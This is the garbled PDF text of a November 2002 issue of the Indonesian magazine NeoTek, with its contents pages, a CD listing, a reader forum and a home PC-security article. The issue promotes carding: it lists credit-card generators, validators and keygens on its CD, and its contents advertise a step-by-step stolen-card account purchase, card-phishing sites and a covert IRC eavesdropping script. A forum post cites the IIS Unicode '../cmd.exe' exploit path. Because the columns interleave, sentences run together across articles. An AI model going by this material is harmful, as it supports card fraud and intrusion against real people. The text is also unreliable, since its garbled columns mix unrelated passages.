Anda di halaman 1dari 50

NeoSoft

Buka-Tutup Portal
Mengendalikan NetBIOS Session Service
Network Neighborhood yang Berbahaya
danya fasilitas network neighborhood
A amat memudahkan kita berbagi file dan
printer (resource share) dalam LAN,
namun apabila komputer anda terhubung ke
Internet, maka share tersebut dapat diakses
dari seluruh dunia dan dengan mudah dilacak
dengan software seperti Legion 2.1.
Hal ini dimungkinkan karena terbukanya port
139 (NetBIOS session service). Untuk menutup
port itu anda harus menonaktifkan TCP/IP dan
File and Printer Sharing for Microsoft Network.
Kemudian apabila ingin berbagi lagi dalam
LAN, keduanya harus diaktifkan lagi.
Kerepotan ini kini tidak perlu lagi. Cukup guna-
kan NoShare untuk menutup port 139 dan
gunakan LetShare untuk membukanya.
Setelah mengklik salah satu utilitas kecil ini,
komputer anda harus di-restart.
Kini buka-tutup portal tidak lagi merepotkan.

ZoneAlarm
pabila anda perlu
A sharing resources
dan akses Internet
sekaligus, maka gunakan
ZoneAlarm firewall yang
memungkinkan anda
menjaga port 139 sambil
tetap mengaktifkan network
neighborhood.
HomePage

N EOTE K
Pendamping Berselancar
www.neotek.co.id Salam!
Cybercrime memang harus
dihindari, tetapi juga
Anatomi suatu serangan hacking

Footprinting
perlu dipahami.
Scanning

Enumeration

Gaining Access • Program Credit Card Generator digunakan oleh para carder untuk mendapatkan
nomor kartu kredit (CC) yang absah.

ahukah anda bahwa istilah carding tidak dikenal


Escalating
Privilege
T dalam perbendaharaan kata bahasa Inggris? Istilah
resmi untuk penyalahgunaan kartu kredit adalah
credit card fraud. Apa pun istilahnya, carding merupakan
tindak kriminal yang perlu dihindari.
Pilfering
Menghindari carding atau aktivitas cybercrime lainnya bukan
berarti kita buta sama sekali terhadap teknik-tekniknya. Justru
harus kita kenal agar dapat terhindar dari kejahatan yang
Covering Tracks
tidak mengenal batas negara ini.
Selain teknik carding, kami sajikan pula ulasan mengenai cara
Creating aparat kepolisian mengantisipasi dan menangani cybercrime.
Backdoors
Redaksi
redaksi@neotek.co.id
Denial of
Service

Bagaimana menghubungi N EOTEK?


Lengkapi pengetahuan hacking
dan PC security anda dengan KONTRIBUSI ARTIKEL
redaksi@neotek.co.id ADMINISTRASI IKLAN
berlangganan majalah NeoTek: Tel. 021-5481457 Fax. 021-5329041
SURAT PEMBACA
Hubungi support@neotek.co.id SIRKULASI NEOTEK
Bagian Sirkulasi WEBMASTER Tel. 021-3854764
webmaster@neotek.co.id ALAMAT REDAKSI
Majalah NeoTek Gedung Cahaya Palmerah Suite 506
Tel. (021) 548 1457 PEMASARAN
pemasaran@neotek.co.id Jl. Palmerah Utara III No. 9
Jakarta 11480
Faks. (021) 532 9041 CHATROOM DI DALNET
#neoteker
email: pemasaran@neotek.co.id
Kontak: Elvi R. Nainggolan MILIS PARA NEOTEKER
http://groups.yahoo.com/group/majalahneotek

November 2002 NeoTek 1


Daftar Isi

Daftar Isi NeoTek Vol. I I I No. 2


NeoStart NeoTutor NeoTekno
Keamanan PC, File, PHP Praktis: Mengatasi Kerusak-
7 dan Software 39 Aplikasi Counter 27 an Windows
Ancaman apa saja yang mung- Tutorial langkah per langkah Teknik menanggulangi blue
kin anda hadapi saat anda melakukan untuk membuat sendiri hit counter untuk screen of death yang sering muncul apa
pekerjaan dengan komputer. situs Web anda dengan PHP. bila Windows anda crash.

VMWare 3.1: Nguping di IRC (2)


12 Steganos Security
Suite II 46 Instalasi Mesin Maya 31 Cara mudah menyusupkan
Utilitas untuk mengamankan Dengan Windows NT/2K/XP skrip anda ke PC orang lain
data dan informasi yang anda simpan di sebagai host, anda dapat menginstal untuk menguping komunikasi chat
komputer anda dengan enkripsi. Linux, FreeBSD maupun Windows lain mereka.
sebagai guest Operating System.
Email Sebagai Senjata
14 Selain alat komunikasi, email
48 VMWare 3.1: 34 Mengenal
Microcontroller Unit
juga dapat disalahgunakan Optimasi & Virtual LAN
Sejalan dengan lanjutan proyek
untuk email kaleng, email palsu sampai Optimasi grafis pada guest OS
digital clock, kita mempelajari lebih jauh
spam yang menjengkelkan. dengna VMWare Tools serta aktifkan
mengenai apa yang dimaksud dengan
mesin maya anda dalam LAN.
microcontroller unit.

Online Security Audit


17 Periksa apakah komputer anda VIA Apollo P4PB 400
dapat diakses lewat Internet
baik melalui Port 139 maupun port-port
38 Produk motherboard terbaru
dari VIA Technology yang
lainnya secara online dengan Shields
mendukung audio chip 6 channel.
UP!! IP Agent.

www.neotek.co.id
Situs NeoTek neotek.kpone.com.sg
Jadikan situs NeoTek sebagai pangkalan Anda berselancar
Link Langsung Layanan Rupa-rupa NeoTek
Kunjungi situs-situs yang dibahas di Perlengkapan berinternet dari situs NeoTek
majalah NeoTek dengan sekali klik
lewat situs NeoTek. Channel #neoteker di Dalnet
Ngobrol ramai-ramai sesama NeoTeker
NeoTek versi PDF Chat Room
Kehabisan NeoTek di kota Anda? Kini tidak usah jauh-jauh untuk ngobrol
Dapatkan saja versi PDF-nya. Gratis! langsung dengan sesama NeoTeker
Mailing List
Download Ini yang paling ramai. Segera ikutan
Tersedia juga download di situs berbagi pengalaman berinternet!
NeoTek selain dari situs aslinya NeoTeker Official Portal
http://neotek.portal.dk3.com
Situs komunikasi antar Neoteker.

2 NeoTek November 2002


Daftar Isi

FOKUS BULAN INI NeoSoft


Buka Tutup Portal
0 Port 139 atau NetBIOS
session service merupakan
Cybercrime untuk Dihindari, celah keamanan pada

Namun Perlu Dipahami Windows yang perlu


diwaspadai.

NeoTekno Apa dan Bagaimana NeoProfil


Carding
Kru NeoTek
Cybercrime di
3 Bermarkas di
18 Indonesia
Gedung Cahaya Palmerah 503
Jl. Palmerah Utara III No. 9
Sejauh mana antisipasi dan Jakarta 11480
kegiatan polri dalam menangani Telp. 021-5481457
cybercrime? Informasi langsung dari Fax. 021-5329041
Kadit Serse Polda Jateng, tempat ter-
ungkapnya kasus terbesar. Pemimpin Umum
Fachri Said
Teknik-teknik Menda-
21 patkan Nomor CC
Pemimpin Redaksi
Kosasih Iskandarsjah
Selain dengan menggunakan
Redaktur Ahli
credit card generator, kita dapat pula
Onno W. Purbo
menjebak orang agar menginformasikan
Michael S. Sunggiardi
nomor kartu kreditnya ke situs web yang
dibuat untuk itu. Pemimpin Usaha
Fahmi Oemar
Ridwan Fachri
Redaktur Pelaksana
Membeli Account Gianto Widianto
24 dengan Cracking- Dadi Pakar
Carding Sekretaris Redaksi
Praktik carding langkah per langkah! Elvy Risma Nainggolan
Diterapkan pada pembelian account Dewan Redaksi
Yahoo! dengan menggunakan credit card David Sugianto
curian. Awas! Sekedar untuk pengetahu- Stanley
an dan bukan untuk diparktikkan.
Webmaster
Supriyanto
NeoTek Desember 2002
Inbox Pemasaran
NmN
Servlet dengan JSP Hedhi Sabaruddin

6 Neoteker menjawab Neoteker


dalam forum milis NeoTek
Membuat sendiri server side script
dengan Java Server Pages untuk
Tuti Sundari
Iklan dan Promosi
menjalankan applet pada sisi klien Stanley
menjadi mudah dengan Java Elvy Risma Nainggolan
NeoRagam dibandingkan PHP.
Keuangan
Ada Apa di CD NeoTek?
4 Carding Tools
Web Site Deface
Kembali membahas Unicode bug
Aswan Bakri

OS dan OS Tools
pada Microsoft IIS. Kali ini berupa
Bank
PC Security
langkah-langkah praktis mengguna- Bank BNI
kan browser maupun FTP client. a.n. PT NeoTek Maju Mandiri
Daftar Isi CD NeoTek
5 Multimedia: Memanipulasi PHP Praktis: Jajak Pendapat
No. rekening 070.001709720.001
Bank BCA KCP Rawamangun
Foto dengan AfterShot Membuat polling dengan PHP. a.n. Aswan Bakri
No. rekening 0940544131

November 2002 NeoTek 3


NeoRagam

Ada Apa di CD NeoTek?


CD NeoTek Fokus bulan ini adalah Carding. ‘Ilmu’ yang boleh dipelajari hanya untuk per-
November 2002 lindungan diri. Selain itu dibahas juga VMWare baik pada Windows maupun
Linux untuk membentuk mesin maya yang kemudian juga jaringan maya.

CARDI NG TOOLS
CC Generator
XCCards Windows
XCCards DOS
XCCMaker
XCredit Master 4.0
XCredit Wizard 1.0
XRandom CC Gen. Pro
ebelum akhirnya XTNT Credit 1.9.1
S diputuskan untuk
memuat artikel be-
CC Keygen
XTNT KeyGen
serta tool-tool carding, telah XTNT KeyGen 1.0
terjadi perdebatan apakah XTNT KeyGen 1.1
‘pantas’ artikel tentang pe- XTNT KeyGen 3.0
nyalahgunaan kartu kredit
(credit card fraud) dimuat di en-generate nomor Visa, Mastercard, atau lain- CC Encrypter
NeoTek.
Dari hasil diskusi dengan
M kartu kredit dapat de-
ngan cara ekstrapolasi
nya. Selanjutnya adalah
memvalidasi nomor-nomor
XTNT NCrpTor
CC Validator
Kadit Serse Polda Jateng terhadap nomor kartu kredit kartu kredit yang terbentuk XTNT CC Validator
yang banyak berurusan de- valid yang ada, atau secara itu. Semua itu memerlukan
ngan cybercrime seperti ini random mengikuti pola pem- keterampilan dan seni ter-
dapat disimpulkan bahwa bentukan nomor berdasar- sendiri. Boleh dipelajari tapi
yang menjadi ukuran adalah kan jenisnya apakah itu jangan dipraktikkan!
niat mempelajarinya, bukan
pengetahuan itu sendiri. PC Security
Dengan demikian pada edisi
O S DAN O S TO O L S PC security tools yang disa-
kali ini NeoTek menjayikan empelajari jikan kali ini mencakup:
sisi gelap dari Internet, yaitu
yang menyangkut tindak
M berbagai
macam sis-
BIOS Password Killer
• !BIOS
pidana cybercrime, khusus- tem operasi meng- Port 139 Security
nya carding. Dipelajari un- haruskan anda • NoShare
tuk dipahami dan melindu- menginstalasi sis- • LetShare
ngi diri, bukan dipraktikkan! tem operasi yang • LeakTest
berbeda-beda pada • UnPlug’nPray
Topik besar lainnya kali ini • XPDite
adalah Guest Operating komputer anda,
yang membawa • IP Agent
System dengan mengguna-
kan VMWare serta PC risiko partisi pada Firewall
security, termasuk bahasan hard disk menjadi • Zone Alarm
berantakan. • Tiny Personal Firewall
tentang penyalahgunaan
fasilitas email untuk Hal ini tidak perlu terjadi instal guest OS nyaris apa Email Tools
mengirim email kaleng, apabila kita menginstal sis- saja: Linux, FreeBSD, Netware, • Private Idaho
tem operasi langsung di pelbagai sistem Windows, • eRemover
email palsu, sampai spam. • eCleaner
bawah partisi sistem ope- bahkan .NET server yang
Berbagai software multi-
terbaru! • MailSweep
media akan menarik perha- rasi yang ada, misalnya • Spam Detective
tian anda, selain update Cygwin atau WinLinux 2001
(versi Unix dan Linux pada OS under Windows Security Suite/Encryption
versi-versi mutakhir dari • Steganos
partisi Windows). XCygwin
program umum berselancar
XWinLinux 2001 • PGPFreeware
dan download accelerator Tetapi bagaimana bila meng- Lain-lain
tools. instalasi distro ‘sungguhan’? Virtual Machine • Eatimer
Instal dulu VMWare pada XVMWare 2.0.3 Win • RegClean 4.1
Windows atau Linux anda XVMWare 3.1 Win • Windows Washer
(host OS) dan lewat XVMWare 3.0 Linux • WinLock
VMWare anda dapat meng- XVMWare 3.1.1 Linux • WinSafe

4 NeoTek November 2002


NeoRagam

daftar isi cd neotek


SERVER & SCRIPTING PROGRAM UMUM
PHP Triad 2.2.1 phptriad2-2-1.exe Acrobat Reader 5.0.5 ar505enu.zip
PWS Setup.exe Folder Match fm.zip
Free Zip freezip.exe
CARDING ICQ Plus iplus34
CCards Windows cccards.zip IE 6 Service Pack 1 ie6setup.exe
CCards DOS ccg_dos.zip mIRC 6.0.2 mirc602.exe
CCMaker ccmaker.zip Office XP Service Pack 1 oxpsp1.exe
Credit Master 4.0 cmaster4.zip Office XP Service Pack 2 oxpsp2.exe
Credit Wizard 1.0 crditwiz.zip Outlook Express 6 ie6setupOR.exe
Random CC Generator Pro ccrng_pro.zip
TNT Credit 1.9.1 thc-c191.zip ReGet Deluxe regetdx.exe
TNT CC Validator credit_card_validator Splitzer splitzer.exe
TNT KeyGen TNT-Alpha v28_KG.exe Time and Chaos chaos32.x.exe
TNT KeyGen1.0 keygen.exe Tweak UI 1.33 tweakui133.exe
TNT KeyGen1.1 keygen.exe Ultimate Zip 2.2 uzsetup.exe
TNT KeyGen3.0 keygen.exe VB Files vbfiles.exe
TNT Ncrptor NCrpToR.exe WS FTP LE ws_ftp_tuc.exe
MS Installer MSInstaller.exe
DOWNLOAD TOOL Opera 6.0.1 Opera6_01Java.exe
Bear Share bsintall.exe PDF2HTML pdf2ht14.zip
Download Accelerator dap5.exe Resource Hacker 3.4.0 ResHack.zip
FlashGet fgf13.exe Shockwave Player Shock8Flash6Player.exe
KaZaa kazaaspeedup.exe Trust Toolbar TrustToolbar.exe
Mozilla mozilla-win32-1.1-installer.exe VB Files vbrun6.exe
Windows Media Player 7 WinMediaPlayer7_1.exe
MULTI MEDIA WinZip Winzip8_1.exe
AfterShot Trial AfterShot1Trial.exe
eZMixer setup.exe
GrooveMaker
Paint Shop Pro 7.0.4
setup.exe
PaintShopPro7_04.exe
M U LT I M E D IA
QuickTime QuickTimeInstaller60.exe
Real Player rp8-standard-setup.exe
Shock Flash Player Shock8Flash6Player.exe
ShowShifter 1.5 ShowShifter1_5
WAV to MP3 Encoder setupwavtomp3.exe
WinAmp 3 winamp3_0-full
Windows Media Player mpsetup.exe
OS DAN OS TOOLS
Cygwin setup.exe
VMWare 3.1 Win VMware-workstation-3.1.1.exe
VMWare 2.03 Win vmware 2.0.3 for win 2000.zip
VMWare 3.1.1 Linux VMware-workstation-3.1.1.tar.gz
WinLinux 2001 wl2001fv.exe
PC SECURITY
!BIOS32 BIOS320
Clean System Directory clnsysdr.zip
Eatimer eat100s.zip
eCleaner clean201.exe
eRemover email_remover.zip Memanipulasi Foto dengan AfterShot
IP Agent IP_Agent.exe AfterShot dari Jasc mem- perti Red Eye, Crop, Rotate,
Leak Test leaktest beri anda alternatif di bi- dan Corrections. Yang bah-
LetShare LetShare.exe
MailSweep ms.exe dang image editing, selain kan lebih mudah diguna-
NoShare NoShare yang sudah populer selama kan adalah Quick Fix But-
PGP Freeware PGPFW703.exe ini seperti PhotoShop. ton yang akan secara oto-
Private Idaho PISETUP.exe Dengan versi trial yang ka- matis akan memperbaiki
RegClean 4.1 regclean kecerahan, kontras dan ke-
Spam Detective spamdetective208.exe mi sertakan pada CD Neo-
Tek bulan ini, anda dapat seimbangan warna foto an-
Steganos s2et.exe
Tiny Personal FW pf2.exe menggunakan AfterShot da hanya dengan mengklik
Unplug and Pray unpnp.exe untuk mengelola dan satu tombol.
Windows Washer wwinstall.exe mengedit koleksi foto anda. Opsi untuk Output
WinLock winlock.exe
WinSafe Winsafe.exe Mudah Digunakan AfterShot memberikan banyak
XPDite XPdite.exe pilihan untuk meng-output
YAPS yaps.exe Jika anda bukan seorang hasil kerja anda. Anda dapat
Zone Alarm zaSetup3125.exe profesional, AfterShot da- menyiapkan foto anda untuk
pat memenuhi kebutuhan di-burn di CD atau untuk
PROYEK anda. Pada program ini
Skrip Nnguping di IRC 2 e-script.exe dikirim lewat email. Anda pun
anda dapat menjumpai dapat menyiapkan foto anda
perangkat image editing untuk situs Web atau wall-
yang lazim dijumpai, se- paper di komputer anda.

November 2002 NeoTek 5


Inbox

NmN
NeoTeker menjawab NeoTeker
Forum ini dimaksudkan sebagai bentuk offline dari mailing list
NeoTek di http://groups.yahoo.com/group/majalahneotek.

Konfigurasi Client Linux J: Posted September 9 file untuk ga bisa ngedown- langganan leased-line ke ISP,
T: Posted September 6 Coba telnet ke telnet.grex.org load. contoh yang ada hu- dan anda negoisasi dengan
sebelumnya daftarin dulu di bungan dengan kata down- "someone" ini. ISP tidak tahu
Saya barusan coba install www.grex.org atau www. load, video (saya mau buka menahu bahwa leased-line
Redhat 7.2. Gimana caranya cyberspace.org. Ntar di sana file yang bernama video.htm nya dipakai 2 pihak.
supaya client yang berbasis bisa kirim email bisa baca aja ga bisa) , *.zip, *.mp3, Kalau memang seperti itu, an-
linux dapat menjadi anggota imel. cem macem dech. *.avi, *.exe dll, mau update da perlu tahu di mata ISP,
dari suatu domain dengan software ga bisa, pokoknya bahwa semua perbuatan illegal
server NT. Maksudnya dia Ianto sangat dirugikan deh, gue yang anda lakukan menjadi
bisa login seperti pada client ianto@diffy.com sbg operator di warnet ini tanggung jawab "someone"
windows. jadi kecewa berat, mau bela- ini. Misalnya, anda/warnet
J: Posted September 9 jar aja udah susah banget
Yang sekarang berjalan, saya anda melakukan exploit, card-
Gampang kok. Cukup dengan (bayagin aja mau coba tes ing, cracking, dsb., kalau dite-
harus login dulu dengan unicode exploit aja ga bisa
user local (Linux ) baru sintak2x standard SMTP dan lusuri akan jatuh ke "some-
POP3 untuk SMTP minimal krn ada penggunaan ...../ one" ini. Dia bisa ditangkap
kemudian kita login kembali cmd.exe...) padahal kan ke-
kejaringan sesuai dengan pakai reference RFC 821 se- polisi dan dipenjara, semen-
dangkan untuk POP3 mini- bijakan untuk ngeblok kayak tara anda bisa santai-santai
pass untuk jaringan. gituan kan bukan urusan dia
mal pakai reference RFC dapat duit dari warnet. Mung-
Dadang 1725 anda dapat download betul gak? kin dulu dia mau menyewa-
scidefamily@hotpop.com dokumen RFC ini diwebsite Ada gak yang bisa nolong gi- kan bandwidth ke anda, kare-
ku cek: mana cara ngakalinnya, ka- na melihat anda punya niat
J: Posted September 8
http://www25.brinkster.com/ yaknya dia pake transparan baik bikin warnet dan punya
Nggak kebalik tuhh??? linux proxy dengan squid sbg proxi- bisnis. Belakangan dia tahu
di jadiin client buat win?? agusk/comm.aspx
nya dan semua request di bahwa anda suka melakukan
Dengan berpedoman pada paksa untuk ngelewatin port hal illegal, salah satunya me-
Ontohodkasep standard RFC ini anda dapat 3128 (port untuk squid) lakukan exploit bahkan mung-
ontohodkasep@yahoo.com membuat program untuk
fajar 913 kin lebih dari itu.
Telnet SMTP dan POP3 SMTP dan POP3 baik dgn
Visual C++, Visual Basic, fajar1913@yahoo.com Nah, daripada dia dituduh
T: Posted September 6 Delphi atau sebagainya. Wa- macam-macam oleh ISP dan
laupun di Internet komponen J: Posted September 9 masuk penjara, pilihannya
Saya tau hal ini pernah di-
gratis untuk SMTP/POP3 Kalo memang dibuat trans- ada 2:
bahas sebelumnya, cuma
imel saya personal storage- untuk vc++,vb atau delphi paran proxy ya udah ngga 1. Putuskan hubungan bisnis
nya kehapus :( jd imel sblm- tapi rasanya enggak sreg ka- bisa diapa-apakan lagi, cara dengan anda
nya hilang semua ada yg tau lau enggak bikin sendiri ka- yang paling dimungkinkan ya 2. Melakukan blok hingga
caranya d/l & ngirim imel rena akan membuat lebih bilang sama admin isp agar anda/warnet anda cuma
pakai telnet? mengetahui proses alur pemblokiran ini dihentikan. bisa browsing, dengan ha-
SMTP/POP3..:) Biasanya dalam kontrak per- rapan anda yang memu-
Alexander tuskan hubungan bisnis
Dgn modal ini, bisa juga janjian kita dengan isp cuma
alex_scorpion@softhome.net sebatas peminjaman jalur Jadi supaya anda tidak mera-
untuk meng-hack server
J: Posted September 9 SMTP/POP3 milik org lain :- yang mereka sediakan, apa na, pilihannya:
p...huss itu enggak baik. yang lewat pada jalur terse- 1. Anda/warnet anda jangan
Pertama anda harus punya
Coba2x sendiri di komputer but ya menjadi hak kita, ti- melakukan pelanggaran/
shell account, cara mengirim
sendiri :-p :D dak boleh ada pemblokiran illegal, dan diskusikan
emailnya tergantung pada
sama sekali... Kalo masih masalah ini.
fasilitas email yang mau di- Agus Kurniawan ngga bisa dan masih di 2. Putuskan hubungan bisnis
pakai. akurniawan@balicamp.com blokir, sepertinya lebih baik dan sewa bandwidth
Kalau biasanya memakai anda pindah ke ISP lain...:) langsung ke ISP. Dengan
fasilitas pine, anda tinggal Warnet Diblok cara ini, kalau anda
mengetikkan: $ pine. Ke- Bondan Muliawan
T: Posted September 9 melakukan perbuatan
mudian anda tinggal route@telkom.net
Kami sebuah warnet..kami illegal, anda sendiri yang
mengikuti perintah2 yg ada menyewa bandwith dari J: Posted July 23 tanggung jawab.
di situ someone (dari pihak ketiga- Dari cerita anda, saya simpul- Albert Siagian
Elisa Usada lah) tapi yang aneh dan lucu kan bahwa "someone" di sini
lisa@fe.uns.ac.id dia dia ngeblock semua file- bukan ISP. Jadi "someone" ini asiagian@gmx.net

6 NeoTek November 2002


NeoStart

Lindungi Investasi Anda


Keamanan PC, File & Software
Ancaman terhadap keamanan komputer, data, dan program di komputer anda selalu menghadang
setiap kali anda menyalakan komputer. Ketahui ancaman apa saja yang dapat merugikan anda
ketika menggunakan komputer, baik online maupun offline.

OMPUTER AKAN SELALU TERANCAM OLEH SERANGAN


K virus, kehilangan data, pelanggaran masalah ke-
amanan dari dalam (oleh anak-anak) dan pelang-
garan keamanan dari luar, seperti hacker dan pencuri. Jika
tidak segera bertindak, anda mungkin akan kehilangan
semua data anda.
Masalah utama lain untuk PC adalah informasi yang tidak
dikehendaki. Atau paling tidak informasi yang tidak ingin
anda share dengan orang lain. Ini bisa berbentuk apa saja
mulai dari hadiah ulang tahun untuk seseorang sampai
pengalaman berselancar di situs-situs karena situs kerap
merekam kunjungan anda. Info lain yang tidak diinginkan
adalah spam-penawaran suatu barang atau jasa yang tidak
dikehendaki dan surat berantai yang menyita waktu, band-
with dan hard disk anda, belum lagi jika email itu bervirus.
Dan akhirnya, masalah yang paling penting adalah bagai-
mana agar kesehatan anda tidak terganggu karena meng- • Pastikan bahwa “Always create backup copy” dipilih (ticked), dan
tentukan agar “Save AutoRecover info every” dilakukan setiap 10
gunakan PC. Semua pengguna komputer bisa mendapat menit.

gangguan ketegangan mata dan sakit kepala. Jadi sebelum


anda mendapat masalah dengan PC anda, buat alat bantu
kerja ini menjadi investasi yang lebih aman.
Pembunuh Terbesar!
Virus komputer bukanlah satu-satunya penyebab hilang-
nya data. Anda sebenarnya seperti telur di ujung tanduk
jika tidak sering-sering menyimpan (save) pekerjaan anda
di komputer. Hilangnya data belum tentu disebabkan oleh
kesalahan anda. Komputer crash, byar-petnya listrik, keru-
sakan pada hard disk, atau kucing yang melompat ke papan
tombol sehingga dokumen yang anda sedang olah tertutup
tanpa sempat disimpan. Semua ini adalah kemungkinan
yang setiap hari bisa menimpa anda ketika berkomputer.
Jadi jika anda tidak ingin kehilangan seluruh halaman A4
• Dengan menggunakan utilitas “Menu Backup” pada Word lewat yang baru saja anda ketik, jangan lupa sering-sering mene-
menu “Tools” dan “Options,” anda dapat memastikan file anda akan kan tombol Save! Anda juga harus dapat menemukan versi
selalu di-save. updated itu di kemudian hari. Banyak program yang mem-

November 2002 NeoTek 7


NeoStart

Microsoft Backup — gratis, tetapi anda perlu menginstalnya

MULAI DARI SINI MASUKKAN CD WINDOWS MENGGUNAKAN MS BACKUP


1 Klik ganda “My Computer” di desk-
top anda. Pada Window yang ter-
2 Anda akan diminta memasukkan
CD-ROM Windows sebelum Win-
3 Anda cukup mengikuti Backup Wi-
zard yang akan membimbing anda
buka pilih “Control Panel,” lalu dows mulai menginstal utilitas “Back- melakukan penyalinan file. Anda ju-
“Add/Remove Programs.” Pada up” yang anda pilih sebelumnya. ga dapat memilih opsi seperti
Window “Add/Remove Program Setelah itu, Backup dapat ditemu- “Changed Files Only.” Pengembalian
Properties” pilih tab “Windows kan di menu Start → Accesories → (restoring) file pun mudah. Anda
Setup” dan pilih “Backup” di System Tools. bahkan dapat me-restore hanya
bawah opsi “System Tools.” sebagian file.

punyai fitur AutoSave yang dapat anda aktifkan. Pada


Microsoft Word, fitur itu dapat dijumpai di bawah Menu
Options, tab Save.
Hindari Kehilangan Data
Komputer bisa ngaco. Sama halnya, hard disk pun bisa
jebol. Untuk masalah yang satu ini, satu-satunya solusi
adalah menyalin ke media penyimpan lain selain hard disk
anda (seperti ZIP, CDR atau bahkan floppy disk untuk do-
kumen-dokumen kecil). Folder berbeda pada hard drive yang
sama berisiko tinggi-semua telur anda taruh di keranjang
yang sama. Bahkan kalaupun anda tidak mempunyai tape
backup, tidak ada alasan bagi anda untuk tidak mengguna-
kan apa saja yang anda miliki. Windows 9x dan XP dileng-
kapi dengan perangkat lunak untuk backup (penyalinan).
Penyalinan dapat dilakukan lewat perangkat apa saja (bah-
kan floppy atau CD-RW dengan menggunakan DirectCD • TrendMicro dengan alamat di http://www.trendmicro.com/
syndication/wtc/ menyediakan fasilitas untuk melacak virus yang dapat
atau yang sejenis), bukan hanya tape drive. Anda hanya digunakan pada situs Web anda. Dengan menambahkan fasilitas ini,
perlu menginstalnya dari CD Windows. situs anda dapat dihubungkan dengan Virus Tracking Center milik
TrendMicro yang memberi informasi mutakhir perkembangan virus di
Apa itu Virus? seluruh dunia.

Virus ada bermacam-macam jenisnya. Kebanyakan bersifat nasi backdoor jika menjalankan Trojan—virus yang menya-
merusak, seperti yang disebut dengan nama worm yang mar sebagai, atau menjadi bagian dari, sebuah program
bisa merusak file anda. Worm yang dijumpai belakangan yang bermanfaat. Salah satu “kejahatan” yang dilakukan
ini merusak semua file gambar JPEG pada sebuah kompu- virus backdoor adalah men-dial nomor telepon premium
ter. Yang lain mencoba menyerang sumber daya komputer tanpa anda sadari sehingga suatu saat tiba-tiba tagihan
seperti mengunci memori, membuat crash pada server Web rekening telepon anda membengkak tidak keruan.
NT, sedangkan yang lainnya lagi hanya mengirim email Yang bisa merepotkan adalah virus boot sector. Boot sector
sampah ke setiap orang yang tercantum pada buku alamat hard disk dimasukkan ke memori sebelum program anti
(address book) anda. Virusnya disertakan sehingga kompu- virus melakukan pemeriksaan (scanning). Jika ada virus, si
ter orang yang dikirimi email sampah tersebut melakukan virus dapat tetap bercokol di memori. Virus ini pun akan
hal yang sama. Itulah sebabnya virus buku alamat tersebar berusaha menginfeksi disk lain, termasuk floppy. Itulah
dengan cepat. Virus LoveLetter diperkirakan mengakibat- sebabnya sebuah disket start up Windows yang bersih
kan kerugian sebesar £10 triliun sebelum dijinakkan. Hanya diperlukan!
dalam waktu 6 jam, satu juta orang menerima virus nakal ini.
Yang mengherankan adalah betapa banyak jenis file yang
Virus backdoor adalah salah satu jenis yang paling men- dapat terinfeksi virus. Yang jelas adalah program .EXE,
jengkelkan karena bisa bekerja berbulan-bulan tanpa dapat tetapi tabel di halaman ini menunjukkan jenis virus yang
dideteksi. Virus ini di latar belakang memantau apa yang dapat bekerja “seperti” suatu program-yang dari luar tam-
anda lakukan—mencuri kata sandi atau nomor kartu kredit paknya paling suci adalah screensaver dan file Help.
anda serta memeriksa data anda. Anda dapat terkontami- Berhati-hatilah-bahaya ada di mana-mana!
8 NeoTek November 2002
NeoStart

kan hal yang berbeda seperti email dan FTP. Dan ini semua
File-file yang dapat menularkan virus kadang dapat ditembus. Program firewall yang populer
belakangan ini adalah Zone Alarm yang ada versi gratis-
Mungkin file pada daftar di bawah ini nya. Sedangkan Tiny versi dua (www.tinysoftware. com)
ada yang akan mengejutkan anda selain gratis juga dapat diandalkan. Norton dan McAfee
pun menawarkan solusi yang sifatnya komersial untuk ini.
Kata orang ‘knowledge is power,’ dan anda dapat Norton dan McAfee mempunyai firewall sebagai bagian
membuktikan kebenaran kata-kata ini dengan dari suite komersial mereka, termasuk:
berbekal daftar virus di bawah ini. Pada daftar ini
anda dapat menjumpai tipe-tipe file yang dapat • Norton Personal Firewall
menularkan virus. Yang jelas adalah file .EXE, tetapi • Norton Internet Security suite (termasuk AntiVirus,
banyak tipe file yang dapat berperilaku seperti Firewall dan Parental Control)
program. Yang tampak paling innocent adalah file • McAfee Firewall
• McAfee Virus and Firewall bundle
Screensaver dan Help.
.EXE Program Windows Anda dapat mengecek seberapa amannyakah komputer
.COM Program DOS anda saat ini dengan mengunjungi situs penguji milik
.SCR Screensaver Steve Gibson: www.grc.com.
.BAT File skrip DOS
.PIF Dihubungkan dengan program DOS
Musuh dalam Selimut
.VBS Visual Basic Script Orang lain yang menggunakan komputer anda bisa me-
.MSI Paket penginstal Windows nimbulkan risiko besar. Mereka dapat menghapus data an-
.MSP Patch penginstal Windows da atau secara tidak sengaja menginstal sesuatu yang mem-
.REG Entri Auto Registry buat PC anda tidak dapat bekerja. Jika PC anda dipakai ber-
.URL tombol pintas Internet sama-sama, lindungi PC anda dengan kata sandi dan enkripsi
sebanyak mungkin. Anda juga dapat menggunakan fitur
.VB File skrip VB
Identities di Windows untuk memilah-milah pengguna
.VBE File skrip VB sehingga setiap orang mempunyai folder My Document
.VBS File skrip VB dan kotak surat email masing-masing sehingga aktivitas
.INF Info untuk setup surat-menyurat anda dapat dijaga kerahasiaannya.
.INS Internet settings
.ISP Internet communication settings Teknik untuk Melindungi Komputer
System Policy Editor (PolEdit) menawarkan perlindungan
Apa itu Firewall? yang lebih besar tetapi agak rumit penginstalannya. PolEdit
Jaringan lokal dan Internet memperbesar risiko keamanan dapat ditemukan di folder Tools\Reskit\Netadmin\ PolEdit
yang untungnya dapat diperkecil dengan memasang fire- pada CD-ROM Windows 98. Gunakan “Add/Remove Pro-
wall pada sistem anda. Seperti pintu anti kebakaran pada grams” pada “Control Panel” untuk menginstalnya. Jangan
bangunan, sarana yang satu ini dapat membantu mencegah batasi suatu profil hanya untuk authorised Windows,
akses yang tidak dikehendaki ke PC anda. Koneksi anda akan karena jika anda membatasinya anda tidak akan bisa men-
bekerja secara dua arah dan orang-orang yang berpotensi jalankan PolEdit kembali untuk mengubahnya! Baca FAQ
“jahat” dapat mengintip atau mencuri data anda. pada http://support.microsoft.com/default.aspx?scid=kb;
en-us;Q147381 secara seksama sebelum mencoba PolEdit.
Program Trojan membantu virus semacam ini, tetapi PC Baca petunjuk kami pada halaman berikut.
anda juga menggunakan PORT berbeda untuk mengerja-

Bahaya browsing dan cara menghindarinya: IE security setting

INTERNET OPTIONS PROMPT KEAMANAN EKSTRA


1 Jalankan Internet Explorer, lalu pilih
menu “Tools.” Klik “Options” dan
2 Anda dianjurkan mengaktifkan
“Prompt” di bawah “ActiveX
3 Untuk mendapat pengamanan eks-
tra untuk semua skrip, cek semua
